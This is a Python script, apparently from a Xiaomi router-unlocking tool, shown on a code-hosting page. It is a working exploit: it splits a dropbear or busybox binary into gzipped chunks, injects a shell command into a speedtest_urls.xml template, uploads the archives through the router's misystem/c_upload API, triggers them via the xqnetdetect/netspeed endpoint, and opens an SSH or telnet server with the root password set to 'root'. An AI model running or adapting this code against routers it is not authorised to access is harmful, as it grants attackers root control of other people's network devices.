You cannot select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
128 lines
3.2 KiB
Python
128 lines
3.2 KiB
Python
#!/usr/bin/env python3
|
|
# -*- coding: utf-8 -*-
|
|
|
|
import os
|
|
import sys
|
|
import re
|
|
import time
|
|
import random
|
|
import hashlib
|
|
import requests
|
|
import socket
|
|
import tarfile
|
|
import gzip
|
|
|
|
import xmir_base
|
|
from gateway import *
|
|
|
|
|
|
gw = create_gateway(ssh_port = 122, die_if_sshOk = True, die_if_ftpOk = False)
|
|
|
|
dn = gw.device_name
|
|
|
|
use_ssh = True
|
|
|
|
dn_tmp = 'tmp/'
|
|
|
|
if use_ssh:
|
|
dn_dir = 'data/payload_ssh/'
|
|
else:
|
|
dn_dir = 'data/payload/'
|
|
|
|
print("Begin creating a payload for the exploit...")
|
|
|
|
if use_ssh:
|
|
fn_pfname = 'dropbearmulti'
|
|
else:
|
|
fn_pfname = 'busybox'
|
|
|
|
fn_pf = f'{dn_tmp}/{fn_pfname}' + '_{num}'
|
|
fn_payload = f'{dn_tmp}/payload' + '_{num}.tar.gz'
|
|
|
|
fn_suffix = '_mips'
|
|
if dn == 'R3D' or dn == 'D01':
|
|
fn_suffix = '_armv7a'
|
|
if dn == "RB03":
|
|
fn_suffix = '_arm64'
|
|
|
|
fn_pf_orig = dn_dir + fn_pfname + fn_suffix
|
|
|
|
for num in range(0, 9):
|
|
fn = fn_payload.format(num = num)
|
|
os.remove(fn) if os.path.exists(fn) else None
|
|
fn = fn_pf.format(num = num)
|
|
os.remove(fn) if os.path.exists(fn) else None
|
|
|
|
with open(fn_pf_orig, "rb") as file:
|
|
pf = file.read()
|
|
pf = gzip.compress(pf, compresslevel = 9)
|
|
|
|
max_payload_size = 100*1024
|
|
max_chunk_size = 90*1024
|
|
|
|
FN_pf = [ ]
|
|
FN_payload = [ ]
|
|
for num in range(0, 9):
|
|
pos = num * max_chunk_size
|
|
chunk = pf[pos:pos+max_chunk_size]
|
|
if not chunk:
|
|
break
|
|
fn = fn_pf.format(num = num)
|
|
with open(fn, "wb") as file:
|
|
file.write(chunk)
|
|
FN_pf.append(fn)
|
|
FN_payload.append(fn_payload.format(num = num))
|
|
|
|
if len(FN_pf) < 1:
|
|
raise RuntimeError('len(FN_pf) < 1')
|
|
|
|
fn_exploit = "exp10it.sh"
|
|
command = f"sh /tmp/{fn_exploit}"
|
|
|
|
fn_executor = "speedtest_urls.xml"
|
|
with open(dn_dir + fn_executor, "rt", encoding = "UTF-8") as file:
|
|
template = file.read()
|
|
|
|
data = template.format(router_ip_address=gw.ip_addr, command=command)
|
|
with open(dn_tmp + fn_executor, "wt", encoding = "UTF-8", newline = "\n") as file:
|
|
file.write(data)
|
|
|
|
for num, fn_pf in enumerate(FN_pf):
|
|
with tarfile.open(FN_payload[num], "w:gz", compresslevel=9) as tar:
|
|
tar.add(fn_pf, arcname = os.path.basename(fn_pf))
|
|
if num == len(FN_pf) - 1:
|
|
tar.add(dn_tmp + fn_executor, arcname = fn_executor)
|
|
tar.add(dn_dir + fn_exploit, arcname = fn_exploit)
|
|
if use_ssh:
|
|
tar.add(dn_dir + 'dropbear.uci.cfg', arcname = 'dropbear.uci.cfg')
|
|
tar.add(dn_dir + 'dropbear.init.d.sh', arcname = 'dropbear.init.d.sh')
|
|
|
|
for num, fn_pf in enumerate(FN_pf):
|
|
os.remove(fn_pf) if os.path.exists(fn_pf) else None
|
|
tgz_size = os.path.getsize(FN_payload[num])
|
|
if tgz_size > max_payload_size - 128:
|
|
die(f'File size "{FN_payload[num]}" exceeds 100KiB')
|
|
|
|
print("Start uploading the exploit with payload...")
|
|
|
|
for num, fn_payload in enumerate(FN_payload):
|
|
requests.post(gw.apiurl + "misystem/c_upload", files={"image":open(fn_payload, 'rb')})
|
|
|
|
time.sleep(1)
|
|
|
|
if use_ssh:
|
|
print(f"Running SSH server on port {gw.ssh_port}...")
|
|
gw.use_ssh = True
|
|
else:
|
|
print("Running TELNET and FTP servers...")
|
|
gw.use_ftp = True
|
|
|
|
requests.get(gw.apiurl + "xqnetdetect/netspeed")
|
|
|
|
time.sleep(0.5)
|
|
gw.passw = 'root'
|
|
gw.ping(contimeout = 27)
|
|
|
|
print("")
|
|
print(f"#### Connection to device {gw.device_name} is OK ####")
|